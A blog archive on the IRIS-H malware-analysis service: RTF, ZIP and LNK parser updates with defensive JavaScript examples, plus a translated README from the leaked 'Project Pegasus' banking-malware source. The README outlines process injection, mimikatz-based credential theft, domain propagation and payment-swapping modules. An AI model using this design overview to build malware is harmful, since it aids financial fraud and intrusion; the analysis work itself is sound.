<span style="background-color: white;"><span style="font-family: "trebuchet ms" , sans-serif;">This project wouldn't be where it is now without such great support from the InfoSec community and all the highly talented people who create beautiful tools and applications that help and inspire a curious mind. There are no words to describe how much I value the collaboration that happens in those communities: you can never stop learning.</span></span><br />
<span style="background-color: white;"><span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></span>
<span style="background-color: white;"><span style="font-family: "trebuchet ms" , sans-serif;">Special kudos go to:</span></span><br />
<br />
<ul>
<li><span style="font-family: "trebuchet ms" , sans-serif;">InfoSec community (honestly, you are machines. I envy your energy!)</span></li>
<li><span style="font-family: "trebuchet ms" , sans-serif;">Angular community on stackoverflow.com (you're mind-blowing folks)</span></li>
<li><span style="font-family: "trebuchet ms" , sans-serif;">Individuals who supported the project with their valuable feedback and file samples. I simply can't post such a big list here and I do not support fame leeching, but you know who you are. I endlessly value our relationships.</span></li>
</ul>
<div>
<span style="font-family: trebuchet ms, sans-serif;"><br /></span></div>
Denis O'Brienhttp://www.blogger.com/profile/07233679823730420087noreply@blogger.com0tag:blogger.com,1999:blog-250109472373647719.post-30080538070592066742018-07-11T13:50:00.002+01:002018-07-11T19:00:22.598+01:00You only had one job...A brief translation of some of the files found in the Project Pegasus source code leak...<br />
<br />
<b><span style="color: #3d85c6;">\Pegasus\README.TXT</span></b><br />
<br />
Project Pegasus - Content brief description<br />
<br />
Pegasus is a complex, structured project for x32 and x64 platforms.<br />
The installer injects the system kernel into svchost process memory and deletes the source file.<br />
<br />
The initial installer passes execution control in the following way:<br />
Shellcode -> InstallDispatcherDll<br />
<br />
The new process passes execution control in the following way:<br />
Shellcode -> WorkDispatcherDll -> all other modules<br />
<br />
If installing over an existing deployment, a build ID check is performed, and if the build ID is lower than or equal to the current version the installation is cancelled.<br />
<br />
Module functionality would take a while to explain and describe here. If absolutely necessary, look at the corresponding source code; the description there is well structured and documented.<br />
<br />
Microsoft Visual Studio 2013+ and PHP Tools for Visual Studio from Devsense are required to build the project.<br />
<br />
Folders description:<br />
<br />
<span style="white-space: pre;"> </span>binres<br />
Compiled modules and other code for x32 and x64 platforms<br />
<span style="white-space: pre;"> </span><br />
<span style="white-space: pre;"> </span>BUILDS<br />
Final installers for both platforms, debug or release version depending on the subfolder they are stored in.<br />
<br />
<span style="white-space: pre;"> </span>inc<br />
Program libraries used by different sub-projects.<br />
<br />
<span style="white-space: pre;"> </span>InstallDispatcherDll<br />
Installer module; performs injection into a new process<br />
<br />
<span style="white-space: pre;"> </span>InstallerExe<br />
Initial installer project<br />
<br />
<span style="white-space: pre;"> </span>lib<br />
Files necessary for compiling the project without MSVCRT<br />
<br />
<span style="white-space: pre;"> </span>LZ4_pack<br />
Resource packing utility<br />
<br />
<span style="white-space: pre;"> </span>mod_CmdExec<br />
Command execution module driven via the panel (new process, console command, etc.)<br />
<br />
<span style="white-space: pre;"> </span>mod_DomainReplication<br />
Domain propagation module<br />
<br />
<span style="white-space: pre;"> </span>mod_KBRI<br />
KBR payment swapping module<br />
<br />
<span style="white-space: pre;"> </span>mod_KBRI_hd<br />
Injector module that intercepts KBR data exchange process and receives swapped data from mod_KBRI<br />
<br />
<span style="white-space: pre;"> </span>mod_LogonPasswords<br />
Password extraction module, re-written and patched mimikatz code<br />
<br />
<span style="white-space: pre;"> </span>mod_NetworkConnectivity<br />
Communication module, including the use of pipes for machines with restricted network access<br />
<br />
<span style="white-space: pre;"> </span>RemoteServiceExe<br />
Special executable file that is uploaded to a remote system in the domain propagation scenario.<br />
<br />
<span style="white-space: pre;"> </span>shared<br />
Common header and configuration files<br />
<br />
<span style="white-space: pre;"> </span>Shellcode<br />
Shellcode that loads and executes the attached libraries<br />
<br />
<span style="white-space: pre;"> </span>tools<br />
Project assembly scripts and utilities<br />
<br />
<span style="white-space: pre;"> </span>WEB<br />
Client part of the admin panel, integrated into the Studio project<br />
<br />
<span style="white-space: pre;"> </span>web-adminpart<br />
Admin panel, a copy from the development server<br />
<br />
<span style="white-space: pre;"> </span>WorkDispatcherDll<br />
System kernel<br />
<br />
In the general case:<br />
\shared\config.h is configured first<br />
\tools\MAKE_INSTALLERS.BAT with the Release or Debug parameter assembles the rest<br />
the \BUILDS\ folder will contain the final build<br />
<br />Denis O'Brienhttp://www.blogger.com/profile/07233679823730420087noreply@blogger.com0tag:blogger.com,1999:blog-250109472373647719.post-65335023680705680252018-03-07T21:47:00.000+00:002018-03-07T22:03:48.390+00:00IRIS-H (alpha): Added RTF files parser module<b style="background-color: white; color: #3d85c6; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: x-large;">Quick Summary</b><br />
<b style="background-color: white; color: #3d85c6; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: x-large;"><br /></b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;"></span><b style="background-color: white; color: #666666; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: 13px;">Build Version</b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">: 0.0.1(alpha)</span><br />
<b style="background-color: white; color: #666666; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: 13px;">Change Type</b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">: new feature</span><br />
<b style="background-color: white; color: #666666; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: 13px;">Affected Components</b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">: API, UI</span><br />
<b style="background-color: white; color: #666666; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: 13px;">Short Description</b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">: API-side code logic (a parser) has been added to allow RTF file processing. Currently, the new parser provides basic data extraction capabilities. The UI-side 'Submission' and 'About' pages have been updated to reflect the changes.</span><br />
<b style="background-color: white; color: #666666; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: 13px;">Outstanding Tasks</b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">: Second development iteration.</span><br />
<span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;"><b>Known Issues</b>: Some data obfuscation types are not supported.</span><br />
<span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;"><br /></span><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;"></span><b style="background-color: white; color: #3d85c6; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: x-large;">Detailed Summary</b><br />
<b style="background-color: white; color: #3d85c6; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: x-large;"><br /></b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">New code logic has been added to IRIS-H to allow Rich Text Format (RTF) file processing. The 'Submission' page now accepts RTF file uploads and passes them on for further processing, which includes the following:</span><br />
<br />
<ul>
<li><span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 13px;">extract document metadata</span></span></li>
<li><span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 13px;">identify and parse embedded objects</span></span></li>
<li><span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 13px;">extract font table</span></span></li>
<li><span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 13px;">detect languages used in the document</span></span></li>
<li><span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 13px;">provide description for all extracted data</span></span></li>
</ul>
<div>
<span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 13px;"><br /></span></span></div>
<div>
<span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 13px;">Currently, the parsing module only provides essential processing. The module was tested with a good number of malicious RTF files and seems to be relatively stable when handling the majority of obfuscation techniques. Thanks to <a href="https://twitter.com/James_inthe_box" rel="nofollow" target="_blank">@James_inthe_box</a> for providing the samples!</span></span></div>
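<div>
<span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 13px;">As an added illustration of the extraction steps listed above (example code written for this page, not IRIS-H's own parser): a small RTF group walker in Node.js that collects \info metadata, the font table, language codes (LCIDs) and embedded \object payloads from a constructed sample document. It assumes grouped font declarations ({\f0\fnil\fcharset0 Name;}) and hex \objdata; raw \binN runs are skipped rather than captured.</span></span></div>

```javascript
// Added example (not IRIS-H's own parser): a compact RTF walker that pulls out
// \info metadata, the font table, language codes (LCIDs) and embedded \object
// payloads. Node.js, no dependencies. The sample document below is constructed
// for this example, not a real-world file.
// Assumptions: fonts are declared in grouped form ({\f0\fnil\fcharset0 Name;})
// and \objdata is hex; raw \binN runs are skipped rather than captured.
'use strict';

const INFO_TEXT = ['title', 'subject', 'author', 'operator', 'company', 'keywords', 'doccomm'];
const INFO_TIME = ['creatim', 'revtim', 'printim'];
const LANG_WORDS = ['lang', 'deflang', 'langfe', 'deflangfe', 'langnp', 'langfenp'];
const OBJ_TYPES = ['objemb', 'objlink', 'objautlink', 'objsub', 'objpub', 'objocx'];

function parseRtf(rtf) {
  const out = { info: {}, fonts: [], languages: new Set(), objects: [] };
  const stack = [];                                    // one record per open group
  const inside = (dest) => stack.some((g) => g.dest === dest);
  const objectGroup = () => [...stack].reverse().find((g) => g.obj);
  // control word | \'hh hex escape | control symbol | group brace | plain text
  const re = /\\([a-zA-Z]+)(-?\d+)? ?|\\'([0-9a-fA-F]{2})|\\([^a-zA-Z])|([{}])|([^\\{}]+)/g;
  let m;
  while ((m = re.exec(rtf)) !== null) {
    const [, word, param, hex, sym, brace, text] = m;
    if (brace === '{') { stack.push({ dest: null, text: '', obj: null }); continue; }
    if (brace === '}') { const g = stack.pop(); if (g) closeGroup(g, stack, out, inside); continue; }
    const g = stack[stack.length - 1];
    if (!g) continue;                                  // bytes outside the root group
    if (word !== undefined) {
      const n = param === undefined ? null : parseInt(param, 10);
      if (g.dest === null) {                           // first control word names the destination
        g.dest = word;
        if (word === 'object') g.obj = { type: null, className: null, autoUpdate: false, data: Buffer.alloc(0) };
        if (word === 'f') g.fontId = n;
      }
      const og = objectGroup();
      if (word === 'fcharset') g.charset = n;
      if (LANG_WORDS.includes(word) && n) out.languages.add(n);
      if (['yr', 'mo', 'dy', 'hr', 'min'].includes(word)) g[word] = n;
      if (og && OBJ_TYPES.includes(word)) og.obj.type = word;
      if (og && word === 'objupdate') og.obj.autoUpdate = true;   // link refreshes when opened
      if (word === 'bin' && n > 0) re.lastIndex += n;  // raw binary run: skip it
    } else if (hex !== undefined) {
      g.text += String.fromCharCode(parseInt(hex, 16));
    } else if (sym !== undefined) {
      if ('\\{}'.includes(sym)) g.text += sym;         // escaped literal; other symbols ignored
    } else if (text !== undefined) {
      g.text += text.replace(/[\r\n]/g, '');           // line breaks carry no meaning in RTF
    }
  }
  out.languages = [...out.languages];
  return out;
}

// Called when a group closes: decide what the finished group contributes.
function closeGroup(g, stack, out, inside) {
  const owner = [...stack].reverse().find((p) => p.obj);   // enclosing \object, if any
  if (g.dest === 'f' && inside('fonttbl')) {
    out.fonts.push({ id: g.fontId, charset: g.charset ?? null, name: g.text.trim().replace(/;$/, '') });
  } else if (INFO_TEXT.includes(g.dest) && inside('info')) {
    out.info[g.dest] = g.text.trim();
  } else if (INFO_TIME.includes(g.dest) && inside('info')) {
    const pad = (v) => String(v ?? 0).padStart(2, '0');
    out.info[g.dest] = `${g.yr}-${pad(g.mo)}-${pad(g.dy)} ${pad(g.hr)}:${pad(g.min)}`;
  } else if (g.dest === 'objclass' && owner) {
    owner.obj.className = g.text.trim();
  } else if (g.dest === 'objdata' && owner) {
    let digits = g.text.replace(/[^0-9a-fA-F]/g, '');  // tolerate whitespace and junk between digits
    if (digits.length % 2) digits = digits.slice(0, -1);
    owner.obj.data = Buffer.from(digits, 'hex');
  } else if (g.obj) {
    out.objects.push(g.obj);
  }
}

// Constructed sample: metadata, two fonts, two languages and an auto-updating
// OLE link whose \objdata hex is split across lines.
const SAMPLE_RTF = String.raw`{\rtf1\ansi\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}{\f1\fnil\fcharset204 Arial;}}
{\info{\title Invoice 4471}{\author Denis}{\operator Alice}{\creatim\yr2018\mo3\dy7\hr21\min47}}
\pard\f0\lang1049 Hello\par
{\object\objautlink\objupdate{\*\objclass Word.Document.8}{\*\objdata 0105
0000 02000000}}
}`;

console.log(JSON.stringify(parseRtf(SAMPLE_RTF), null, 2));
```

<div>
<span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 13px;">Because the tokeniser drops unknown control words and only hex digits are kept inside \objdata, whitespace and stray control words inserted between the hex digits, a common RTF obfuscation, do not break the extraction. Two cases this walker does not handle are nested groups inside \objdata (their text is not joined to the owner's data) and \binN payloads, which are skipped; an \objautlink with \objupdate and a SoapMoniker or URL in the data is the shape of the OLE autolink case in the example reports below.</span></span></div>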
<div>
<span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 13px;"><br /></span></span></div>
<div>
<span style="color: #3d85c6; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 13px;"><b>Example Reports</b></span></span></div>
<div>
<span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 13px;"><br /></span></span></div>
<div>
<span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 13px;"><a href="https://iris-h.services/report/c3d93db2aa5aaf4f821548e15d79946e" rel="nofollow" target="_blank">https://iris-h.services/report/c3d93db2aa5aaf4f821548e15d79946e</a> - CVE-2017-11882</span></span></div>
<div>
<span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 13px;"><a href="https://iris-h.services/report/247f2739e20053ea397b748c35398c63" rel="nofollow" target="_blank">https://iris-h.services/report/247f2739e20053ea397b748c35398c63</a> - OLE Autolink update using SoapMoniker</span></span></div>
<div>
<span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 13px;"><a href="https://iris-h.services/report/fea6546e3299a31a58a3aa2a6b7060c9" rel="nofollow" target="_blank">https://iris-h.services/report/fea6546e3299a31a58a3aa2a6b7060c9</a> - ASLR/DEP evasion using msvbvm60.dll (CVE-2017-11826 precursor)</span></span></div>
<div>
<span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;"><br /></span></div>
<div>
<span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;"><br /></span></div>
<div>
<span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;"><br /></span></div>
<div>
<span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;"><br /></span></div>
Denis O'Brienhttp://www.blogger.com/profile/07233679823730420087noreply@blogger.com0tag:blogger.com,1999:blog-250109472373647719.post-13517792986361995012018-02-05T18:33:00.000+00:002018-03-07T22:03:32.338+00:00IRIS-H (alpha): Added ZIP files support<b style="background-color: white; color: #3d85c6; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: x-large;">Quick Summary</b><br />
<b style="background-color: white; color: #3d85c6; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: x-large;"><br /></b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;"></span><b style="background-color: white; color: #666666; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: 13px;">Build Version</b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">: 0.0.1(alpha)</span><br />
<b style="background-color: white; color: #666666; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: 13px;">Change Type</b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">: new feature</span><br />
<b style="background-color: white; color: #666666; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: 13px;">Affected Components</b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">: API, UI</span><br />
<b style="background-color: white; color: #666666; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: 13px;">Short Description</b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">: API-side code logic has been added to allow submitting zipped files. The industry-standard password '<b>infected</b>' is supported. The UI-side 'Submission' and 'About' pages have been updated to reflect the changes.</span><br />
<b style="background-color: white; color: #666666; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: 13px;">Outstanding Tasks</b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">: None</span><br />
<span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;"><b>Known Issues</b>: ZIP files created with Ubuntu 'Archive Manager' throw an error.</span><br />
<span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;"><br /></span><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;"></span><b style="background-color: white; color: #3d85c6; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: x-large;">Detailed Summary</b><br />
<b style="background-color: white; color: #3d85c6; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: x-large;"><br /></b><span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="background-color: white; font-size: 13px;">Code logic has been added to IRIS-H to handle file extraction from ZIP archives. The 'Submission' page now accepts ZIP file uploads and performs the following operations on them:</span></span><br />
<br />
<ul>
<li><span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 13px;">identify if the file is a Microsoft Office document in OOXML format</span></span></li>
<li><span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 13px;">identify the number of files in the archive</span></span></li>
<li><span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 13px;">identify if the password is set</span></span></li>
<li><span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 13px;">identify the unpacked size of the compressed file contained in the archive</span></span></li>
<li><span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 13px;">identify if the archive file is 'nested'</span></span></li>
</ul>
<br />
<span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="background-color: white; font-size: 13px;">The following restrictions and limitations are applied:</span></span><br />
<br />
<ul>
<li><span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 13px;">ZIP file must contain a single file</span></span></li>
<li><span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 13px;">if ZIP file password is enabled it must be set to '<b>infected</b>'</span></span></li>
<li><span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 13px;">unpacked size of the compressed file contained in the archive must not exceed 10MB</span></span></li>
<li><span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 13px;">ZIP 'nesting' must not exceed 2 levels (ZIP-in-a-ZIP)</span></span></li>
<li><span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 13px;">ZIP file size must not exceed 4MB*</span></span></li>
</ul>
<div>
<i>* 4MB ZIP file size limit is enforced by the underlying technology employed to handle the file extraction. More on this in the following section.</i></div>
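<div>
<br /></div>
<div>
<span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 13px;">The checks in the two lists above, as an added example written for this page (not IRIS-H's code, which performs them in a C# Lambda with SharpZipLib): reading a ZIP's central directory in Node.js to count entries, spot the encryption flag, sum unpacked sizes and detect OOXML and ZIP-in-a-ZIP, all without extracting anything. The archive writer and the sample archives are constructed here; the 'encrypted' sample only sets the header flag bit so that the check can be exercised.</span></span></div>

```javascript
// Added example (not IRIS-H's code, which does this in a C# Lambda with SharpZipLib):
// triage a ZIP submission from its central directory alone, without extracting
// anything. Node.js, no dependencies. The archives below are constructed in memory
// for this example; 'encrypted' only sets header flag bit 0 so the check can be
// exercised, no real ZipCrypto/AES is applied to the bytes.
'use strict';

function crc32(buf) {
  let c = 0xffffffff;
  for (const b of buf) {
    c ^= b;
    for (let k = 0; k < 8; k++) c = (c >>> 1) ^ (0xedb88320 & -(c & 1));
  }
  return (c ^ 0xffffffff) >>> 0;
}

// Minimal writer: STORED entries only; local headers, central directory, EOCD.
function buildZip(entries) {
  const locals = [], centrals = [];
  let offset = 0;
  for (const e of entries) {
    const name = Buffer.from(e.name, 'utf8'), flags = e.encrypted ? 0x0001 : 0, crc = crc32(e.data);
    const local = Buffer.alloc(30), central = Buffer.alloc(46);
    local.writeUInt32LE(0x04034b50, 0); local.writeUInt16LE(20, 4); local.writeUInt16LE(flags, 6);
    local.writeUInt32LE(crc, 14); local.writeUInt32LE(e.data.length, 18); local.writeUInt32LE(e.data.length, 22);
    local.writeUInt16LE(name.length, 26);
    central.writeUInt32LE(0x02014b50, 0); central.writeUInt16LE(20, 4); central.writeUInt16LE(20, 6);
    central.writeUInt16LE(flags, 8); central.writeUInt32LE(crc, 16); central.writeUInt32LE(e.data.length, 20);
    central.writeUInt32LE(e.data.length, 24); central.writeUInt16LE(name.length, 28); central.writeUInt32LE(offset, 42);
    locals.push(local, name, e.data); centrals.push(central, name);
    offset += local.length + name.length + e.data.length;
  }
  const cd = Buffer.concat(centrals), eocd = Buffer.alloc(22);
  eocd.writeUInt32LE(0x06054b50, 0); eocd.writeUInt16LE(entries.length, 8); eocd.writeUInt16LE(entries.length, 10);
  eocd.writeUInt32LE(cd.length, 12); eocd.writeUInt32LE(offset, 16);
  return Buffer.concat([...locals, cd, eocd]);
}

// Find the end-of-central-directory record and walk the central directory.
// Reports entry count, encryption flag, total unpacked size, OOXML and ZIP-in-ZIP
// without inflating anything (deflated payloads are judged by name only).
function inspectZip(buf) {
  let eocd = -1;
  for (let i = buf.length - 22; i >= Math.max(0, buf.length - 22 - 65535); i--) {
    if (buf.readUInt32LE(i) === 0x06054b50) { eocd = i; break; }
  }
  if (eocd < 0) throw new Error('not a ZIP: no end-of-central-directory record');
  const count = buf.readUInt16LE(eocd + 10);
  let p = buf.readUInt32LE(eocd + 16);
  const r = { entries: count, encrypted: false, unpackedSize: 0, ooxml: false, nested: false, names: [] };
  for (let n = 0; n < count; n++) {
    if (buf.readUInt32LE(p) !== 0x02014b50) throw new Error('corrupt central directory');
    const flags = buf.readUInt16LE(p + 8), method = buf.readUInt16LE(p + 10);
    const csize = buf.readUInt32LE(p + 20), usize = buf.readUInt32LE(p + 24);
    const nameLen = buf.readUInt16LE(p + 28), extraLen = buf.readUInt16LE(p + 30), commentLen = buf.readUInt16LE(p + 32);
    const localOff = buf.readUInt32LE(p + 42);
    const name = buf.toString('utf8', p + 46, p + 46 + nameLen);
    r.names.push(name);
    r.unpackedSize += usize;
    if (flags & 0x0001) r.encrypted = true;                 // general-purpose bit 0: entry is encrypted
    if (name === '[Content_Types].xml') r.ooxml = true;     // OPC part list: Office Open XML package
    let nested = name.toLowerCase().endsWith('.zip');
    if (!nested && method === 0 && csize >= 4) {            // stored payload: look for a local header signature
      const dataOff = localOff + 30 + buf.readUInt16LE(localOff + 26) + buf.readUInt16LE(localOff + 28);
      nested = dataOff + 4 <= buf.length && buf.readUInt32LE(dataOff) === 0x04034b50;
    }
    if (nested) r.nested = true;
    p += 46 + nameLen + extraLen + commentLen;
  }
  return r;
}

// Constructed samples: a ZIP-in-a-ZIP with a misleading name, an OOXML-shaped
// package, and an entry flagged as encrypted.
const INNER_ZIP = buildZip([{ name: 'payload.txt', data: Buffer.from('hello') }]);
const OUTER_ZIP = buildZip([{ name: 'sample.bin', data: INNER_ZIP }]);
const DOCX_ZIP = buildZip([
  { name: '[Content_Types].xml', data: Buffer.from('ct') },
  { name: 'word/document.xml', data: Buffer.from('body text') },
]);
const LOCKED_ZIP = buildZip([{ name: 'dropper.js', data: Buffer.from('x'), encrypted: true }]);

for (const [label, z] of [['outer', OUTER_ZIP], ['docx', DOCX_ZIP], ['locked', LOCKED_ZIP]]) {
  console.log(label, inspectZip(z));
}
```

<div>
<span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 13px;">The 'password set' answer comes from each entry's general-purpose flag bit 0, so it tells you that extraction will need a password, not that the password is 'infected'; that is only known once extraction is attempted. The nested-archive check reads the first four bytes of a stored payload, so a deflated inner ZIP is caught only by its name; an extractor should repeat the check on the inflated bytes before counting nesting levels. The unpacked size comes from the central directory, which a hostile archive can understate, so the 10MB limit still has to be enforced while inflating.</span></span></div>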
<div>
<br /></div>
<div>
<b><span style="color: #3d85c6;">What's under the hood?</span></b></div>
<div>
<br /></div>
<div>
<u>Disclaimer</u>: The choice of technology used to implement ZIP file support was mainly driven by a desire to learn it. Another contributing factor, though, is the lack of good NodeJS libraries that handle password-protected ZIP files.</div>
<div>
<br /></div>
<div>
IRIS-H API and UI components are written in different flavours of JavaScript. Originally, I was looking to implement ZIP file support using a JS library, but to my surprise I couldn't find one with proper support for the different compression and encryption types. I realized it would have to be implemented in a different programming language, but integration with the rest of the service and its infrastructure seemed challenging until I decided to look into using AWS Lambda.</div>
<div>
<br /></div>
<div>
<a href="https://aws.amazon.com/lambda/" rel="nofollow" target="_blank">AWS Lambda</a> supports a number of programming languages, including C# on .NET Core 2.0, which opens up a good number of possible solutions. The choice fell on <a href="https://github.com/icsharpcode/SharpZipLib" rel="nofollow" target="_blank">SharpZipLib</a>, a library that supports most compression and encryption methods. Building an AWS Lambda function turned out to be a rather easy task. The most challenging part was dealing with the '<a href="https://docs.aws.amazon.com/lambda/latest/dg/limits.html" rel="nofollow" target="_blank">RequestResponse</a>' payload size limit enforced by the '<a href="https://docs.aws.amazon.com/lambda/latest/dg/API_Invoke.html" rel="nofollow" target="_blank">Invoke</a>' API. The only solution I could find was to apply the ZIP file size limit at submission time. It's currently set to 4 MB because of Lambda's 6 MB limit on the synchronous invocation payload: the 2 MB difference covers the base64 encoding the submitted ZIP file undergoes when sent to the Lambda function (base64 expands data by a factor of 4/3, so 4 MB becomes roughly 5.3 MB on the wire). </div>
<div>
<br /></div>
<div>
Testing with ZIP files of different sizes shows that it takes about 10 seconds on average to process a 4 MB ZIP file. Those under 1 MB are processed almost without delay.</div>
<div>
<br /></div>
<div>
Like the rest of the service, this new feature is experimental and requires more thorough testing. I'd appreciate any feedback.</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
Denis O'Brienhttp://www.blogger.com/profile/07233679823730420087noreply@blogger.com0tag:blogger.com,1999:blog-250109472373647719.post-42350880284665482352017-12-10T21:49:00.000+00:002017-12-10T21:49:43.083+00:00IRIS-H (alpha): Added LNK files "Console Data Block" structure parser<b style="background-color: white; color: #3d85c6; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: x-large;">Quick Summary</b><br style="background-color: white; color: #666666; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: 13px;" /><b style="background-color: white; color: #3d85c6; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: x-large;"><br /></b><span style="background-color: white; color: #666666; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: 13px;"></span><b style="background-color: white; color: #666666; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: 13px;">Build Version</b><span style="background-color: white; color: #666666; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: 13px;">: 0.0.1(alpha)</span><br style="background-color: white; color: #666666; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: 13px;" /><b style="background-color: white; color: #666666; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: 13px;">Change Type</b><span style="background-color: white; color: #666666; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: 13px;">: feature update</span><br style="background-color: white; color: #666666; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: 13px;" /><b style="background-color: white; color: #666666; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: 13px;">Affected Components</b><span style="background-color: white; color: #666666; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: 13px;">: API</span><br style="background-color: white; color: #666666; font-family: "Trebuchet MS", Trebuchet, 
sans-serif; font-size: 13px;" /><b style="background-color: white; color: #666666; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: 13px;">Short Description</b><span style="background-color: white; color: #666666; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: 13px;">: A parser for the LNK file "Console Data Block" structure has been added. The parser attempts to extract all relevant data stored in "Console Data Block" structures, which hold the console window settings for the link target.</span><br />
